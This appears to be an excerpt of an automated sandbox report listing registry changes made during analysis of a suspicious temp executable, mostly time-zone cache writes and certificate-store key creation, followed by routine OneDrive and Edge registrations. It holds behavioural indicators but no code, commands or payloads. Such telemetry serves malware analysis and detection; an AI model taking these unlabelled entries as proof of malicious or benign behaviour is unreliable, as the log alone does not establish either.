Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\17\52C64B7E\C:\Windows\system32\,@tzres.dll,-41 = "E. South America Daylight Time" C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\17\52C64B7E\C:\Windows\system32\,@tzres.dll,-261 = "GMT Daylight Time" C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\17\52C64B7E\C:\Windows\system32\,@tzres.dll,-72 = "Newfoundland Standard Time" C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\17\52C64B7E\C:\Windows\system32\,@tzres.dll,-2772 = "Omsk Standard Time" C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\17\52C64B7E\C:\Windows\system32\,@tzres.dll,-1411 = "Syria Daylight Time" C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\17\52C64B7E\C:\Windows\system32\,@tzres.dll,-2512 = "Lord Howe Standard Time" C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\17\52C64B7E\C:\Windows\system32\,@tzres.dll,-1471 = "Magadan Daylight Time" C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\17\52C64B7E\C:\Windows\system32\,@tzres.dll,-961 = "Paraguay Daylight Time" C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\17\52C64B7E\C:\Windows\system32\,@tzres.dll,-2842 = "Saratov Standard Time" C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\17\52C64B7E\C:\Windows\system32\,@tzres.dll,-842 = "Argentina Standard Time" C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\17\52C64B7E\C:\Windows\system32\,@tzres.dll,-2372 = "Easter Island Standard Time" C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\17\52C64B7E\C:\Windows\system32\,@tzres.dll,-751 = "Tonga Daylight Time" C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe N/A
Key created \REGISTRY\USER\S-1-5-19\Software\Classes\Local Settings\MuiCache\16\52C64B7E \??\c:\windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\17\52C64B7E\C:\Windows\system32\,@tzres.dll,-651 = "AUS Central Daylight Time" C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\17\52C64B7E\C:\Windows\system32\,@tzres.dll,-681 = "E. Australia Daylight Time" C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\17\52C64B7E\C:\Windows\system32\,@tzres.dll,-192 = "Mountain Standard Time" C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\17\52C64B7E\C:\Windows\system32\,@tzres.dll,-1501 = "Turkey Daylight Time" C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\17\52C64B7E\C:\Windows\system32\,@tzres.dll,-931 = "Coordinated Universal Time" C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\17\52C64B7E\C:\Windows\system32\,@tzres.dll,-1971 = "Belarus Daylight Time" C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\17\52C64B7E\C:\Windows\system32\,@tzres.dll,-791 = "SA Western Daylight Time" C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\17\52C64B7E\C:\Windows\system32\,@tzres.dll,-2571 = "Turks and Caicos Daylight Time" C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\17 C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\17\52C64B7E\C:\Windows\system32\,@tzres.dll,-221 = "Alaskan Daylight Time" C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\17\52C64B7E\C:\Windows\system32\,@tzres.dll,-2001 = "Cabo Verde Daylight Time" C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\17\52C64B7E\C:\Windows\system32\,@tzres.dll,-282 = "Central Europe Standard Time" C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\17\52C64B7E\C:\Windows\system32\,@tzres.dll,-11 = "Azores Daylight Time" C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\17\52C64B7E\C:\Windows\system32\,@tzres.dll,-301 = "Romance Daylight Time" C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\17\52C64B7E\C:\Windows\system32\,@tzres.dll,-832 = "SA Eastern Standard Time" C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\17\52C64B7E\C:\Windows\system32\,@tzres.dll,-591 = "Malay Peninsula Daylight Time" C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe N/A
Set value (data) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\17\52C64B7E\C:\Windows\system32\,@tzres.dll,-162 = "Central Standard Time" C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\17\52C64B7E\C:\Windows\system32\,@tzres.dll,-51 = "Greenland Daylight Time" C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\17\52C64B7E\C:\Windows\system32\,@tzres.dll,-691 = "Tasmania Daylight Time" C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" C:\Windows\system32\svchost.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\17\52C64B7E\C:\Windows\system32\,@tzres.dll,-1022 = "Bangladesh Standard Time" C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\17\52C64B7E\C:\Windows\system32\,@tzres.dll,-1842 = "Russia TZ 4 Standard Time" C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\17\52C64B7E\C:\Windows\system32\,@tzres.dll,-621 = "Korea Daylight Time" C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" C:\Windows\system32\svchost.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Interface\{79A2A54C-3916-41FD-9FAB-F26ED0BBA755}\TypeLib C:\Users\Admin\AppData\Local\Microsoft\OneDrive\StandaloneUpdater\OneDriveSetup.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\WOW6432Node\Interface\{2F12C599-7AA5-407A-B898-09E6E4ED2D1E}\TypeLib\ = "{BAE13F6C-0E2A-4DEB-AA46-B8F55319347C}" C:\Users\Admin\AppData\Local\Microsoft\OneDrive\StandaloneUpdater\OneDriveSetup.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Interface\{869BDA08-7ACF-42B8-91AE-4D8D597C0B33}\ = "ISyncEngineBandwidthLimiter" C:\Users\Admin\AppData\Local\Microsoft\OneDrive\StandaloneUpdater\OneDriveSetup.exe N/A
Key deleted \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_CLASSES\WOW6432NODE\INTERFACE\{0F872661-C863-47A4-863F-C065C182858A}\PROXYSTUBCLSID32 C:\Users\Admin\AppData\Local\Microsoft\OneDrive\StandaloneUpdater\OneDriveSetup.exe N/A
Key deleted \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_CLASSES\INTERFACE\{F062BA81-ADFE-4A92-886A-23FD851D6406}\TYPELIB C:\Users\Admin\AppData\Local\Microsoft\OneDrive\StandaloneUpdater\OneDriveSetup.exe N/A
Key deleted \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_CLASSES\WOW6432NODE\INTERFACE\{8D3F8F15-1DE1-4662-BF93-762EABE988B2}\TYPELIB C:\Users\Admin\AppData\Local\Microsoft\OneDrive\StandaloneUpdater\OneDriveSetup.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\WOW6432Node\Interface\{4410DC33-BC7C-496B-AA84-4AEA3EEE75F7}\ProxyStubClsid32 C:\Users\Admin\AppData\Local\Microsoft\OneDrive\StandaloneUpdater\OneDriveSetup.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\CLSID\{47E6DCAF-41F8-441C-BD0E-A50D5FE6C4D1}\ProgID\ = "NucleusToastActivator.NucleusToastActivator.1" C:\Users\Admin\AppData\Local\Microsoft\OneDrive\StandaloneUpdater\OneDriveSetup.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\SOFTWARE\Microsoft\Speech_OneCore\Isolated\PIjyYIeAhMCaaV = "Microsoft Mark Mobile - English (United States)" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\CLSID\{71DCE5D6-4B57-496B-AC21-CD5B54EB93FD}\ = "SyncEngineFileInfoProvider Class" C:\Users\Admin\AppData\Local\Microsoft\OneDrive\StandaloneUpdater\OneDriveSetup.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\mssharepointclient\shell\open\command\ = "\"C:\\Users\\Admin\\AppData\\Local\\Microsoft\\OneDrive\\21.160.0808.0002\\Microsoft.SharePoint.exe\" /protocol:\"%1\"" C:\Users\Admin\AppData\Local\Microsoft\OneDrive\StandaloneUpdater\OneDriveSetup.exe N/A
Key deleted \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\WOW6432Node\Interface\{390AF5A7-1390-4255-9BC9-935BFCFA5D57} C:\Users\Admin\AppData\Local\Microsoft\OneDrive\StandaloneUpdater\OneDriveSetup.exe N/A
Key deleted \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\WOW6432Node\CLSID\{4410DC33-BC7C-496B-AA84-4AEA3EEE75F7} C:\Users\Admin\AppData\Local\Microsoft\OneDrive\StandaloneUpdater\OneDriveSetup.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ReadingMode\SettingsVersion = "2" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Key deleted \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\WOW6432Node\CLSID\{7AFDFDDB-F914-11E4-8377-6C3BE50D980C} C:\Users\Admin\AppData\Local\Microsoft\OneDrive\StandaloneUpdater\OneDriveSetup.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Interface\{F0AF7C30-EAE4-4644-961D-54E6E28708D6}\ProxyStubClsid32 C:\Users\Admin\AppData\Local\Microsoft\OneDrive\StandaloneUpdater\OneDriveSetup.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\TypeLib\{909A6CCD-6810-46C4-89DF-05BE7EB61E6C}\1.0\FLAGS\ = "0" C:\Users\Admin\AppData\Local\Microsoft\OneDrive\StandaloneUpdater\OneDriveSetup.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\WOW6432Node\Interface\{1B71F23B-E61F-45C9-83BA-235D55F50CF9}\TypeLib\ = "{BAE13F6C-0E2A-4DEB-AA46-B8F55319347C}" C:\Users\Admin\AppData\Local\Microsoft\OneDrive\StandaloneUpdater\OneDriveSetup.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Interface\{fac14b75-7862-4ceb-be41-f53945a61c17}\TypeLib\ = "{BAE13F6C-0E2A-4DEB-AA46-B8F55319347C}" C:\Users\Admin\AppData\Local\Microsoft\OneDrive\StandaloneUpdater\OneDriveSetup.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\grvopen\shell\open C:\Users\Admin\AppData\Local\Microsoft\OneDrive\StandaloneUpdater\OneDriveSetup.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FavOrder\Favorites C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\PendingRecovery C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Key deleted \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_CLASSES\WOW6432NODE\CLSID\{71DCE5D6-4B57-496B-AC21-CD5B54EB93FD}\VERSIONINDEPENDENTPROGID C:\Users\Admin\AppData\Local\Microsoft\OneDrive\StandaloneUpdater\OneDriveSetup.exe N/A
Key deleted \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_CLASSES\INTERFACE\{B05D37A9-03A2-45CF-8850-F660DF0CBF07}\PROXYSTUBCLSID32 C:\Users\Admin\AppData\Local\Microsoft\OneDrive\StandaloneUpdater\OneDriveSetup.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\WOW6432Node\Interface\{a7126d4c-f492-4eb9-8a2a-f673dbdd3334}\TypeLib\Version = "1.0" C:\Users\Admin\AppData\Local\Microsoft\OneDrive\StandaloneUpdater\OneDriveSetup.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\DomainSuggestion\FileNames\ C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\SOFTWARE\Microsoft\Speech_OneCore\Isolated\PIjyYIeAhMCaaV = "Microsoft Mark Mobile" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\WOW6432Node\Interface\{2B865677-AC3A-43BD-B9E7-BF6FCD3F0596}\ = "IFileSyncClient11" C:\Users\Admin\AppData\Local\Microsoft\OneDrive\StandaloneUpdater\OneDriveSetup.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGStatus\DynamicCodePolicy = 05000000 C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\TypeLib C:\Users\Admin\AppData\Local\Microsoft\OneDrive\StandaloneUpdater\OneDriveSetup.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\WOW6432Node\CLSID\{7B37E4E2-C62F-4914-9620-8FB5062718CC}\LocalServer32 C:\Users\Admin\AppData\Local\Microsoft\OneDrive\StandaloneUpdater\OneDriveSetup.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\WOW6432Node\CLSID\{82CA8DE3-01AD-4CEA-9D75-BE4C51810A9E}\InprocServer32\ThreadingModel = "Apartment" C:\Users\Admin\AppData\Local\Microsoft\OneDrive\StandaloneUpdater\OneDriveSetup.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\TypeLib\{F904F88C-E60D-4327-9FA2-865AD075B400}\1.0\ = "Microsoft SharePoint Type Library" C:\Users\Admin\AppData\Local\Microsoft\OneDrive\StandaloneUpdater\OneDriveSetup.exe N/A
Key deleted \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\AppID\OneDrive.EXE C:\Users\Admin\AppData\Local\Microsoft\OneDrive\StandaloneUpdater\OneDriveSetup.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\TypeLib\{909A6CCD-6810-46C4-89DF-05BE7EB61E6C}\1.0\HELPDIR\ = "C:\\Users\\Admin\\AppData\\Local\\Microsoft\\OneDrive\\21.160.0808.0002" C:\Users\Admin\AppData\Local\Microsoft\OneDrive\StandaloneUpdater\OneDriveSetup.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\WOW6432Node\Interface\{1b7aed4f-fcaf-4da4-8795-c03e635d8edc}\TypeLib\Version = "1.0" C:\Users\Admin\AppData\Local\Microsoft\OneDrive\StandaloneUpdater\OneDriveSetup.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGStatus\DynamicCodePolicy = 05000000 C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\TypeLib\{638805C3-4BA3-4AC8-8AAC-71A0BA2BC284}\1.0\HELPDIR C:\Users\Admin\AppData\Local\Microsoft\OneDrive\StandaloneUpdater\OneDriveSetup.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\WOW6432Node\Interface\{53de12aa-df96-413d-a25e-c75b6528abf2} C:\Users\Admin\AppData\Local\Microsoft\OneDrive\StandaloneUpdater\OneDriveSetup.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\WOW6432Node\CLSID\{94269C4E-071A-4116-90E6-52E557067E4E}\ProgID\ = "OOBERequestHandler.OOBERequestHandler.1" C:\Users\Admin\AppData\Local\Microsoft\OneDrive\StandaloneUpdater\OneDriveSetup.exe N/A
Key deleted \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_CLASSES\WOW6432NODE\INTERFACE\{EE15BBBB-9E60-4C52-ABCB-7540FF3DF6B3}\PROXYSTUBCLSID32 C:\Users\Admin\AppData\Local\Microsoft\OneDrive\StandaloneUpdater\OneDriveSetup.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Interface\{2EB31403-EBE0-41EA-AE91-A1953104EA55}\ = "ISyncEngineEvents" C:\Users\Admin\AppData\Local\Microsoft\OneDrive\StandaloneUpdater\OneDriveSetup.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\WOW6432Node\CLSID\{5AB7172C-9C11-405C-8DD5-AF20F3606282}\InprocServer32 C:\Users\Admin\AppData\Local\Microsoft\OneDrive\StandaloneUpdater\OneDriveSetup.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\WOW6432Node\CLSID\{A926714B-7BFC-4D08-A035-80021395FFA8}\LocalServer32 C:\Users\Admin\AppData\Local\Microsoft\OneDrive\StandaloneUpdater\OneDriveSetup.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Explorer\Main C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\FileSyncClient.AutoPlayHandler.1\ = "FileSyncClient AutoPlayHandler Class" C:\Users\Admin\AppData\Local\Microsoft\OneDrive\StandaloneUpdater\OneDriveSetup.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\WOW6432Node\Interface\{1196AE48-D92B-4BC7-85DE-664EC3F761F1}\TypeLib C:\Users\Admin\AppData\Local\Microsoft\OneDrive\StandaloneUpdater\OneDriveSetup.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\WOW6432Node\Interface\{0d4e4444-cb20-4c2b-b8b2-94e5656ecae8}\ProxyStubClsid32 C:\Users\Admin\AppData\Local\Microsoft\OneDrive\StandaloneUpdater\OneDriveSetup.exe N/A
Key deleted \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\WOW6432Node\CLSID\{5AB7172C-9C11-405C-8DD5-AF20F3606282} C:\Users\Admin\AppData\Local\Microsoft\OneDrive\StandaloneUpdater\OneDriveSetup.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\TypeLib\{082D3FEC-D0D0-4DF6-A988-053FECE7B884}\1.0\0\win32 C:\Users\Admin\AppData\Local\Microsoft\OneDrive\StandaloneUpdater\OneDriveSetup.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Interface\{B54E7079-90C9-4C62-A6B8-B2834C33A04A}\ProxyStubClsid32 C:\Users\Admin\AppData\Local\Microsoft\OneDrive\StandaloneUpdater\OneDriveSetup.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\SyncEngineFileInfoProvider.SyncEngineFileInfoProvider\CLSID C:\Users\Admin\AppData\Local\Microsoft\OneDrive\StandaloneUpdater\OneDriveSetup.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\WOW6432Node\CLSID\{9489FEB2-1925-4D01-B788-6D912C70F7F2}\VersionIndependentProgID\ = "StorageProviderUriSource.StorageProviderUriSource" C:\Users\Admin\AppData\Local\Microsoft\OneDrive\StandaloneUpdater\OneDriveSetup.exe N/A
Key deleted \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_CLASSES\WOW6432NODE\INTERFACE\{AF60000F-661D-472A-9588-F062F6DB7A0E}\TYPELIB C:\Users\Admin\AppData\Local\Microsoft\OneDrive\StandaloneUpdater\OneDriveSetup.exe N/A
Key deleted \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_CLASSES\WOW6432NODE\CLSID\{71DCE5D6-4B57-496B-AC21-CD5B54EB93FD}\PROGID C:\Users\Admin\AppData\Local\Microsoft\OneDrive\StandaloneUpdater\OneDriveSetup.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Interface\{D0ED5C72-6197-4AAD-9B16-53FE461DD85C}\TypeLib C:\Users\Admin\AppData\Local\Microsoft\OneDrive\StandaloneUpdater\OneDriveSetup.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Interface\{d8c80ebb-099c-4208-afa3-fbc4d11f8a3c}\ = "IGetLibrariesCallback" C:\Users\Admin\AppData\Local\Microsoft\OneDrive\StandaloneUpdater\OneDriveSetup.exe N/A
Key deleted \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_CLASSES\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\DEFAULTICON C:\Users\Admin\AppData\Local\Microsoft\OneDrive\21.160.0808.0002\FileSyncConfig.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\DomainSuggestion\FileNames C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\SOFTWARE\Microsoft\Speech_OneCore\Isolated\PIjyYIeAhMCaaV = "Microsoft" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
